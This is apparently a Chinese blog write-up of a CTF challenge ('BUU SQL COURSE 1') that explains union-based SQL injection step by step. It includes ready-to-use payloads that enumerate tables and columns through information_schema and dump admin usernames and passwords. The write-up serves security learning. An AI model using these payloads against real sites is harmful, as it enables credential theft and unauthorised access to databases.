一.BUU SQL COURSE 1
SQL注入
类型
字符型、数字型、搜索型
过程
F12找到了隐藏url,存在get请求传参
?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1、判断是否存在注入、注入是字符型还是数字型
id=1 order by 1#
id=1' order by 1#
数字型
2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致)
id=1 order by 2#
id=1 order by 3#
说明select查出了两列
或者直接union select也可以判断
3、确定显示位置(确定在屏幕上显示的结果与select查询列的对应关系,因为某些网页可能会适当调整输出结果的排列顺序,更加美观,但是在注入前,我需要知道我想要获取到的结果会在哪里显示)
4、获取当前数据库名,获取表名,字段名,内容
由于information_schema这个库是mysql的四个基本系统库之一,它存储了mysql的库名、表名、字段名等信息。可以用information_schema来查询该库名下的所有表名。由于表可能不止是一个,那无法存储到一个字段中,就可以用group_concat来拼接,形成一个字符串来进行返回。
在information_schema数据库中还可以利用的表:
schema_name 储存了所有数据库的库名
table_schema 储存了数据库名
tables 储存了数据库库名,以及该库中包含的表名
table_name 储存了表名
columns 储存了所有字段名
0 union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema=database()#
0 union select group_concat(username),group_concat(password) from admin
拿到密码,去登陆
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 手把手教你在本地部署DeepSeek R1,搭建web-ui ,建议收藏!
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 互联网不景气了那就玩玩嵌入式吧,用纯.NET开发并制作一个智能桌面机器人(三):用.NET IoT库
· 【非技术】说说2024年我都干了些啥